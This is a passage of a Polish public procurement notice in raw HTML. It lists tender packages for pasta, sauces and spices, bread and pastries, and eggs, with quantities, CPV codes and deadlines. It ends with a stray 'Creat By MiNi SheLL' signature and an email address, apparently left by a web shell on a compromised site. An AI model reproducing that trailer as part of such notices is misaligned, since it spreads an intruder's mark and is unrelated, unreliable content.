10
Brzoskwinie 3860
szt. 
30
Ananasy 2780
szt. 
30
Makaron Nitki Swojski - 250g , nie gorszy niż firmy Czarnecki
szt. 
1 500
Makaron Tasiemka walcowana - 500g , nie gorszy niż firmy Czarnecki
szt. 
250
Makaron Kolanka 3 kg , nie gorszy niż firmy Knorr
szt. 
50
Poz: 81 - 104



Makaron Kokardki 3 kg , nie gorszy niż firmy Knorr
szt. 
125
Koncentrat barszczu  Krokus
szt. 
50
Pieprz mielony czarny 1 kg, nie gorszy niż firmy Kamis
szt. 
4
Przyprawa typu Vegeta 200g
szt. 
230
Przyprawa w płynie typu Maggi 5l, nie gorsza niż firmy Knorr
szt. 
15
Baton czekoladowy nadziewany 23,5g
szt. 
1 200
Delikat do drobiu 700g, nie gorszy niż firmy Knorr
szt. 
20
Delikat do ryb 700g, nie gorszy niż firmy Knorr
szt. 
10
Ciastka kruche z cukrem
kg
50
Pierniki z lukrem 2,5 kg
szt. 
50
Majonez 700g, nie gorszy niż firmy Winiary
szt. 
40
Marynata do wieprzowiny 750g, nie gorsza niż firmy Knor
szt. 
10
Napój różne smaki 1 kg, nie gorszy niż firmy Alsa
szt. 
270
Sos Bolognese 1,2 kg, nie gorszy niż firmy Knorr
szt. 
20
Sos Napoli 1 kg, nie gorszy niż firmy Knorr
szt. 
20
Sos grzybowy 1,1 kg, nie gorszy niż firmy Knorr
szt. 
15
Sos myśliwski 1,1 kg, nie gorszy niż firmy Knorr
szt. 
20
Sos włoski 700g nie gorszy niż firmy Knorr (sałatkowy)
szt. 
17
Sos Sałatkowy-Ogrodowy  700g, nie gorszy niż firmy Knorr
szt. 
18
Sos Słodko-Kwaśny 1,5 kg, nie gorszy niż firmy Knorr
szt. 
8
Zupa krem z borowików 1,4 kg, nie gorsza niż firmy Knorr
szt. 
29
Żurek 1 kg
szt. 
13
Ziele angielskie 350g, nie gorsze niż firmy Knorr
szt. 
12
Woda mineralna PRIMAVERA 5l
szt.
200.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.85.10.00-8, 15.89.00.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Pakiet nr 5  pieczywo i wyroby cukiernicze.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Pakiet nr 5  pieczywo i wyroby cukiernicze
Bułka wrocławska 100g
szt.
1100
Bułka tarta 500g
szt.
770
Bułka maślana 100g
szt.
1 600
Chleb 600g
szt.
6 000
Bułki mini 30g
szt.
1 000
Chleb słonecznikowy 500g
szt.
1 860
Chleb graham 500g
szt.
500
Chleb wieloziarnisty 500g
szt.
800
Chleb kukurydziany 300g
szt.
1 200
Chleb orkiszowy 400g
szt.
600
Chleb razowy ze szpinakiem 500g
szt.
400
Chleb pszenny 300g
szt.
1 100
Chleb z otrębani 300g
szt.
600
Babka cytrynowa  300g
szt.
1 000
Bułka drożdżowa z serem lub owocami
szt.
2 200
Pączki z marmoladą
szt.
3 000
Bułka maślana z jabłkiem lub serem 100g
szt.
2 800
Ciasto maślane z budyniem (tacka) 200g
szt.
600
Babka marmurkowa 400g
szt.
900.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.81.10.00-6, 15.83.30.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Pakiet nr 6  jaja.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Pakiet nr 6  jaja
Jaja klasy M
Szt.
32 800.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.14.30.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com